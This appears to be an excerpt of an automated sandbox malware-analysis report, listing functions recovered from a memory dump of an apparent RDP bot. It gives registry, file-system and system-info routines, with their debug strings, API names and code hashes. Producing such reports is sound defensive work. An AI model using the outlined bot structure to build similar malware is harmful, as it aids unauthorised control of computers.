                                                                                                                                                  • String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                                                                                                                                  • API String ID: 1390976747-812936415
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenValuefflushfwrite
                                                                                                                                                  • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 716145365-253406552
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseDeleteOpenValuefflushfwrite
                                                                                                                                                  • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                                                  • API String ID: 3240087161-1648311886
                                                                                                                                                  • Opcode ID: 62e57cf57ee6356259cec7bfbfd030278a47240fd7e32c31abfc4d8de364641a
                                                                                                                                                  • Instruction ID: c8b6e7f5f892c62490877c7089d894523bbda77634a8b46633d72b3350786cb3
                                                                                                                                                  • Opcode Fuzzy Hash: 62e57cf57ee6356259cec7bfbfd030278a47240fd7e32c31abfc4d8de364641a
                                                                                                                                                  • Instruction Fuzzy Hash: 05816061A0C70F81FA34A74CA948B787260AF78745F540133FB9EC66F5FE6DA9A58301
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$_mbscpy
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                                                  • API String ID: 3496426206-906809513
                                                                                                                                                  • Opcode ID: 1dee9945764b32408ed50647483c32612e7ab9312a1b55d70a295882058ca74b
                                                                                                                                                  • Instruction ID: c1907cc194aac4839adce4957f9d40f415d340f37c7743d4cd4747370dfe3354
                                                                                                                                                  • Opcode Fuzzy Hash: 1dee9945764b32408ed50647483c32612e7ab9312a1b55d70a295882058ca74b
                                                                                                                                                  • Instruction Fuzzy Hash: EB716022E0C64791FB705B5DEA40BB91261AFBC784F540132FB4ED7696DE6CE8A5C301
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseEnumOpen
                                                                                                                                                  • String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
                                                                                                                                                  • API String ID: 1332880857-1739142668
                                                                                                                                                  • Opcode ID: ec000305f97fcc9b7831efca2c653eed5ef4651eec74f5d45be2df6e378591d6
                                                                                                                                                  • Instruction ID: 77f0452d1f165861de21f01cf6838826c4c145b26fa9bf7f42b8edb4e27439cd
                                                                                                                                                  • Opcode Fuzzy Hash: ec000305f97fcc9b7831efca2c653eed5ef4651eec74f5d45be2df6e378591d6
                                                                                                                                                  • Instruction Fuzzy Hash: 87B1737690C54282F770874DE440B782262AFB8759F5A0133F75ECF6A9DE7CE9A68301
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                                                                                                                                  • API String ID: 1799206407-2463373822
                                                                                                                                                  • Opcode ID: 912818cb803c858290649b2350f006b194764e49bf29187046575fd208de8be6
                                                                                                                                                  • Instruction ID: 437adcaa0ef716d1c93c8a31813b19ebf2ccd89ec5d7c2c11845e23626524cb0
                                                                                                                                                  • Opcode Fuzzy Hash: 912818cb803c858290649b2350f006b194764e49bf29187046575fd208de8be6
                                                                                                                                                  • Instruction Fuzzy Hash: 4D5150A0E0C61B81FA345B4DA940BB82261BF7C794F540133EB5FC6AD0FE6DA9658302
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastMetricsSystem$fflushfwrite
                                                                                                                                                  • String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
                                                                                                                                                  • API String ID: 144387239-4168848430
                                                                                                                                                  • Opcode ID: eb4690e27fa6215081d6e6de91d6af8b90ce825f0c937a061c463600406fc136
                                                                                                                                                  • Instruction ID: ad9689b3156f48fb4b283946b361abe6f92d3f5451fe84045baa69c99209a218
                                                                                                                                                  • Opcode Fuzzy Hash: eb4690e27fa6215081d6e6de91d6af8b90ce825f0c937a061c463600406fc136
                                                                                                                                                  • Instruction Fuzzy Hash: 6A714950F0C54786FB74975CA904B7972A5EF38749F901033FB0EDA2DADEACA9A49301
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                                                                                                                                  • String ID: (hnd != NULL)$(out != NULL)$H:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                                                                                                                                  • API String ID: 2123903355-1944070753
                                                                                                                                                  • Opcode ID: 36d7c1dc9db9ccf4b1edfea7063ef554aa244e211b5bc8d96b098d0b2331572f
                                                                                                                                                  • Instruction ID: 250d952c378ea516ca58ba6d82791d695f8734baca23527f715370af51a608c8
                                                                                                                                                  • Opcode Fuzzy Hash: 36d7c1dc9db9ccf4b1edfea7063ef554aa244e211b5bc8d96b098d0b2331572f
                                                                                                                                                  • Instruction Fuzzy Hash: 56412572A082428AE760CF6CE540A6977B1FB6C794F400236EB5DD3698EF3CE854CB00
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreate
                                                                                                                                                  • String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
                                                                                                                                                  • API String ID: 2932200918-412249795
                                                                                                                                                  • Opcode ID: 6ae6085569b0b128f2829ddf323c1c9bd220a946938d24aec418bc5112106390
                                                                                                                                                  • Instruction ID: fc412152dcb1f93a338eb4601a224a2f6accbdef62d5ae3a8f0e6cba3351b2ba
                                                                                                                                                  • Opcode Fuzzy Hash: 6ae6085569b0b128f2829ddf323c1c9bd220a946938d24aec418bc5112106390
                                                                                                                                                  • Instruction Fuzzy Hash: E6518C62E0C65382FA348B4CE650BB96271AF38798F450232FB4DD76A4DF2CE965C740
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Processstrlen$AllocFree
                                                                                                                                                  • String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile$ErrorLast
                                                                                                                                                  • String ID: (attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Deletefflushfwrite
                                                                                                                                                  • String ID: (key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
                                                                                                                                                  APIs
                                                                                                                                                  • UnlockFileEx.KERNEL32(?,?,?,?,?,?,00000000,000002234F5413D0,?,00007FF6BE0389CF,?,?,00000000,00007FF6BE038CE3), ref: 00007FF6BE0341BD
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,000002234F5413D0,?,00007FF6BE0389CF,?,?,00000000,00007FF6BE038CE3), ref: 00007FF6BE0341CE
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000002234F5413D0,?,00007FF6BE0389CF,?,?,00000000,00007FF6BE038CE3), ref: 00007FF6BE034284
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                                                                                                                                                  • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorGlobalLastMemoryStatus
                                                                                                                                                  • String ID: $(mi != NULL)$;$H:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF6BE034AD5,?,?,?,?,?,000002234F5413D0,00007FF6BE034BE5), ref: 00007FF6BE0349A1
                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF6BE034AD5,?,?,?,?,?,000002234F5413D0,00007FF6BE034BE5), ref: 00007FF6BE0349AC
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                  • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$RDP-Controller.lock$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                                                                                                  • String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastTime
                                                                                                                                                  • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                                                                                                                                  • API String ID: 2291555494-1574117953
                                                                                                                                                  • Opcode ID: cc0d7606d5d0a2fa097d4fa6822c57d715a1e4d8514272c53164d401d9c15be8
                                                                                                                                                  • Instruction ID: 1161d5943fd09f83103f69cd446bebd129391be155cb3f85d7a936b38ada9b21
                                                                                                                                                  • Opcode Fuzzy Hash: cc0d7606d5d0a2fa097d4fa6822c57d715a1e4d8514272c53164d401d9c15be8
                                                                                                                                                  • Instruction Fuzzy Hash: 3E517361D1C14382FB304B1CA585B796160AF387AAF184232FB6EDB6D4DF3CAD658341
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$strtol
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                                                                                                                  • API String ID: 3596500743-1951032453
                                                                                                                                                  • Opcode ID: 238c79f2b28e87de002f3402ad78c006d43888cb07f7983ebb66f4b32daff710
                                                                                                                                                  • Instruction ID: 4f287d754d5645bfc6ecc14895da8170c8dc27c630e37e4ff575c15b93ae4af6
                                                                                                                                                  • Opcode Fuzzy Hash: 238c79f2b28e87de002f3402ad78c006d43888cb07f7983ebb66f4b32daff710
                                                                                                                                                  • Instruction Fuzzy Hash: C5216021A08A4792E721DB19F940BAA7770FB68784F444132FF4C87664DF3CD9A6CB00
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  • Opcode ID: 42a5c2173597e114f9880ba43546d7a88f42eec6ff72c2f0a33b3ace71511f2e
                                                                                                                                                  • Instruction ID: 329de3270db286011740fb53ad373df4a84438c47686b3c3102ff9ce8a44e1cb
                                                                                                                                                  • Opcode Fuzzy Hash: 42a5c2173597e114f9880ba43546d7a88f42eec6ff72c2f0a33b3ace71511f2e
                                                                                                                                                  • Instruction Fuzzy Hash: E5213722A08A4696E721DF19F940BAA23B5FB69784F444036FF8C87664DF3CD9A5C700
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$_mbscat
                                                                                                                                                  • String ID: (file_path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file$service
                                                                                                                                                  • API String ID: 3951308622-2217284372
                                                                                                                                                  • Opcode ID: b8b76ab31a40a3d4960c29d1d6da39be99acdea2726b26025418f3b2195c7509
                                                                                                                                                  • Instruction ID: aad0b254e60e1e427561df503e61bf117e83648400cc6bef12ff7d47d5983c1b
                                                                                                                                                  • Opcode Fuzzy Hash: b8b76ab31a40a3d4960c29d1d6da39be99acdea2726b26025418f3b2195c7509
                                                                                                                                                  • Instruction Fuzzy Hash: 59118161A0868784FA259F2DAD11BB956A19F79B88F4C8131EF4D8F286DE2CD4258340
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                                                  • API String ID: 1004003707-2568489879
                                                                                                                                                  • Opcode ID: 2e1ec48f1ce53da15b288e546176908832de149df3b5402700c5c2fba8d6dfb2
                                                                                                                                                  • Instruction ID: d0b76e397b19ea9ccc6f52c09594a286bacd4e1facc8e1ebb2115a0801954b94
                                                                                                                                                  • Opcode Fuzzy Hash: 2e1ec48f1ce53da15b288e546176908832de149df3b5402700c5c2fba8d6dfb2
                                                                                                                                                  • Instruction Fuzzy Hash: EA411B61E0964792FA24DB48B940BB86370BB38344F844637FB5D9A595DF3CE96AC300
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                                                  • API String ID: 1004003707-3977765790
                                                                                                                                                  • Opcode ID: ddacccf6af20dea2d09e73c8ab2f8e8bbf93bd688b8492cfa30044c9ac5ab41e
                                                                                                                                                  • Instruction ID: 5703abd0cd96b6ef9ff74888491e23149d0e37feefe5fb67744c3ebaa6c0667d
                                                                                                                                                  • Opcode Fuzzy Hash: ddacccf6af20dea2d09e73c8ab2f8e8bbf93bd688b8492cfa30044c9ac5ab41e
                                                                                                                                                  • Instruction Fuzzy Hash: 0C41FFA1B0964791FA20DB58E940BB82270FB38398F944537FB4D8A5A5DF7CE966D300
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                                                                                                                  • API String ID: 2918714741-719680006
                                                                                                                                                  • Opcode ID: db69bd356b19582b7b3e077722370c03f868c6cfd7eb9de0e0838f2971b70153
                                                                                                                                                  • Instruction ID: 02628c9848c7515d0d5b5d2ab6077e34099f45d367533987a85496afcb88e7cd
                                                                                                                                                  • Opcode Fuzzy Hash: db69bd356b19582b7b3e077722370c03f868c6cfd7eb9de0e0838f2971b70153
                                                                                                                                                  • Instruction Fuzzy Hash: EE215C61A0864796E721DF59F940BAA37B0BB68784F444036FF4C87655DF3CE8A5CB00
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                  • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                                                                                                                                  • API String ID: 384173800-4041758303
                                                                                                                                                  • Opcode ID: 5291cd93b414ba6c424e77f612c9ff6642894636800bc1888b68a92809d904ce
                                                                                                                                                  • Instruction ID: 077664f75aa7db31d659d4b09262ebdfe74c990979fac17f8590c38e0e931f7a
                                                                                                                                                  • Opcode Fuzzy Hash: 5291cd93b414ba6c424e77f612c9ff6642894636800bc1888b68a92809d904ce
                                                                                                                                                  • Instruction Fuzzy Hash: 04F0DA24E0AA1790EE15DB5AFE544B827B4BF78794B840137EA0DD7320EE3CA56AD300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
                                                                                                                                                  • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                                                                                                                                                  • API String ID: 39653677-2979476222
                                                                                                                                                  • Opcode ID: ded80575854a2ac1c31e98b4d13eabe6bc3d5566ee1ac97b299903925feaac68
